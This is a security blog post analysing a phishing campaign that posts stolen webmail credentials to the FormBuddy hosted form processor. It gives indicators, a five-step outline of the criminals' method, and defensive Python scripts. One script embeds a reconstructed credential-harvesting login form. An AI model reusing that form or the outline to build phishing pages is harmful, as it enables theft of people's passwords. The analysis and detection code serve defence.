Phishing For Passwords via FormBuddy.com

Most InfoSec professionals have heard of “layer 8” as the unofficial layer of the OSI Model. For those of you who don’t know, Layer 8 refers to people. Meaning, no matter how good your security posture, there is always that very predictably unpredictable and unpatchable vulnerability known as the user. It is often easier to exploit a person through social engineering than it is to find another attack vector. Take for example this spam email received by some unsuspecting end users:

The email message above looks very basic. It appears to be coming from a reliable source. The subject is “Document” and there is only one sentence in the body, “I sent a document to you, to view it click on the document below.”

For many users this would seem like a normal work email. Even if they didn’t think it was normal, they might not assume it’s malicious or a phishing email.

Below you can see the URL when hovering over the “Document” text:

Clicking on that link redirects the user to the following webpage:

Scanning that URL (hxxps://dk-media.s3.amazonaws[.]com/media/1npoq/downloads/311511/share.html) via VirusTotal shows a detection ratio of 4/68 (as of 8/18/16) as a “malicious” and “phishing” site. The link to that VirusTotal report can be found HERE.

Below is a snapshot of the source code showing a form action URL of hxxp://www.formbuddy[.]com/cgi-bin/form.pl, a method of “POST”, an input value for “username” (rifart45f is the account name on FormBuddy.com), as well as a URL pointing to what appears to be a legitimate sub-domain (webmail.luriechildrens[.]org):

Using some fake credentials I attempted to “Sign In” and was redirected to the URL shown in the source code (hxxp://www.formbuddy[.]com/cgi-bin/form.pl). Again, this was a web login page for an Outlook account.

The phishing site would appear to be targeting the legitimate web portal located at “hxxps://webmail.luriechildrens.org”. Luriechildrens.org is a site for the Ann & Robert H. Lurie Children’s Hospital in Chicago.
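The form described above has a recognizable shape: a password field, an action pointing at a third-party form processor on another host over plain HTTP, and a hidden field carrying the URL of the real portal the victim is bounced to afterwards. The script below is an added example (not code from the post or from FormBuddy) that pulls those indicators out of a page’s HTML so an analyst or a URL-scanning pipeline can flag it. The HTML it parses is constructed to match the post’s description, not the real source of the lure page, and the list of form-processor hosts is an assumption to be extended locally.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts of remotely hosted form processors seen abused in this case (assumed list; extend as needed).
FORM_PROCESSOR_HOSTS = {"formbuddy.com", "www.formbuddy.com"}

# The lure page URL from the post (defanged there, written plainly here so urlparse can use it).
PAGE_URL = "https://dk-media.s3.amazonaws.com/media/1npoq/downloads/311511/share.html"

# Constructed HTML approximating the form the post describes; this is NOT the page's real source.
SAMPLE_HTML = """
<html><body>
<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="POST">
  <input type="hidden" name="username" value="rifart45f">
  <input type="hidden" name="url" value="https://webmail.luriechildrens.org">
  <input type="text" name="email" placeholder="Email">
  <input type="password" name="password" placeholder="Password">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # html.parser gives None for valueless attributes
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "GET").upper(),
                             "inputs": []}
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": a.get("type", "text").lower(),
                                            "name": a.get("name", ""),
                                            "value": a.get("value", "")})

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def analyze_forms(html, page_url):
    """Return one finding per form with the indicators that make it look like a credential harvester."""
    page = urlparse(page_url)
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        action = urlparse(form["action"])
        action_host = action.netloc.lower()
        indicators = []
        if any(i["type"] == "password" for i in form["inputs"]):
            indicators.append("collects_password")
        if action_host and action_host != page.netloc.lower():
            indicators.append("cross_origin_action")
        if action_host in FORM_PROCESSOR_HOSTS:
            indicators.append("third_party_form_processor")
        if page.scheme == "https" and action.scheme == "http":
            indicators.append("submits_over_plain_http")
        # A hidden field carrying a URL on some other host is the redirect-after-submit trick:
        # the victim lands on the genuine portal and assumes a mistyped password.
        redirect_to = [i["value"] for i in form["inputs"]
                       if i["type"] == "hidden"
                       and i["value"].startswith(("http://", "https://"))
                       and urlparse(i["value"]).netloc.lower() != action_host]
        if redirect_to:
            indicators.append("hidden_redirect_url")
        hidden = {i["name"]: i["value"] for i in form["inputs"] if i["type"] == "hidden"}
        findings.append({
            "action": form["action"], "action_host": action_host, "method": form["method"],
            "hidden_fields": hidden, "redirect_targets": redirect_to, "indicators": indicators,
            # Password collection plus off-site submission is the combination worth alerting on.
            "suspicious": "collects_password" in indicators
                          and ("third_party_form_processor" in indicators
                               or "cross_origin_action" in indicators),
        })
    return findings


if __name__ == "__main__":
    for finding in analyze_forms(SAMPLE_HTML, PAGE_URL):
        print(finding)
```

The `hidden_fields` output is also where the processor account name (here `username`) surfaces, which is the value you would hand to the form-processor’s abuse contact or use to pivot across other lure pages using the same account.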

Scanning hxxp://www.formbuddy[.]com/cgi-bin/form.pl via VirusTotal shows a detection ratio of 3/68 as a “malicious” and “phishing” site (as of 8/18/16). The link to that VirusTotal report can be found HERE.

Predictably, I was able to capture my fake credentials in the POST request, which was sent in the clear:

Trying to submit another set of credentials directly on hxxp://www.formbuddy[.]com/cgi-bin/form.pl doesn’t seem to do anything. I’m not finding any POST or GET request, and clicking the Sign In button doesn’t even return an error with my fake credentials.

Doing some research I found that attackers use FormBuddy as a means to steal victims’ passwords. Essentially, FormBuddy allows anyone to have a remotely hosted form processor for their website. Here are the steps criminals use to steal passwords from their victims:

Step 1: Select a hosted form service like FormBuddy.
Step 2: Create a fake login page used to grab user credentials.
Step 3: Host the login page.
Step 4: Send phishing emails pointing to your newly created fake login page.
Step 5: Stolen credentials are emailed to your FormBuddy account.

Flagging traffic to and from FormBuddy (in particular the POST to its form processor seen above) might be the best solution for this type of phishing attack.
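To make that flagging concrete, here is an added example (not part of the original post) of the detection logic run over web-proxy logs: a POST to the FormBuddy form processor is treated as a likely credential submission, and a visit to the known lure URL as a lower-severity hit. The log lines are constructed in a simple Squid-like layout for the example, and the host and URL lists are seeded only with the indicators named in the post.

```python
import re
from urllib.parse import urlparse

# Constructed proxy log lines (timestamp client method url status); not real traffic.
SAMPLE_LOG = """\
1471500001.123 10.0.0.15 GET https://dk-media.s3.amazonaws.com/media/1npoq/downloads/311511/share.html 200
1471500007.456 10.0.0.15 POST http://www.formbuddy.com/cgi-bin/form.pl 302
1471500009.789 10.0.0.15 GET https://webmail.luriechildrens.org/ 200
1471500020.000 10.0.0.22 GET https://www.example.com/ 200
1471500031.000 10.0.0.31 POST http://www.formbuddy.com/cgi-bin/form.pl 200
"""

# Indicators from the post, written plainly (the post defangs them) so they match log URLs.
FORM_PROCESSOR_HOSTS = {"formbuddy.com", "www.formbuddy.com"}
LURE_URLS = {"https://dk-media.s3.amazonaws.com/media/1npoq/downloads/311511/share.html"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def parse_line(line):
    """Parse one log line into a dict, or None if the line does not match the expected layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def scan_log(text):
    """Return alerts for credential POSTs to a form processor and for visits to known lure pages."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        host = urlparse(rec["url"]).netloc.lower()
        if rec["method"] == "POST" and host in FORM_PROCESSOR_HOSTS:
            # Form data leaving the network for a third-party processor: assume credentials were posted.
            alerts.append({"ts": rec["ts"], "client": rec["client"], "url": rec["url"],
                           "reason": "credential_post_to_form_processor", "severity": "high"})
        elif rec["url"] in LURE_URLS:
            # Lure page fetched but no POST seen yet: worth a look, not yet a confirmed submission.
            alerts.append({"ts": rec["ts"], "client": rec["client"], "url": rec["url"],
                           "reason": "visited_known_lure_page", "severity": "medium"})
    return alerts


def affected_clients(alerts):
    """Clients whose credentials should be reset: those with a high-severity (POST) alert."""
    return sorted({a["client"] for a in alerts if a["severity"] == "high"})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print("reset passwords for:", affected_clients(found))
```

The POST itself is the high-confidence signal because, as the post shows, that is the moment the credentials leave the browser; the lure-page visit alone only tells you who opened the link. Because the processor is on plain HTTP, the same POST is also visible to any network capture, which is what the post’s own packet capture relied on.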
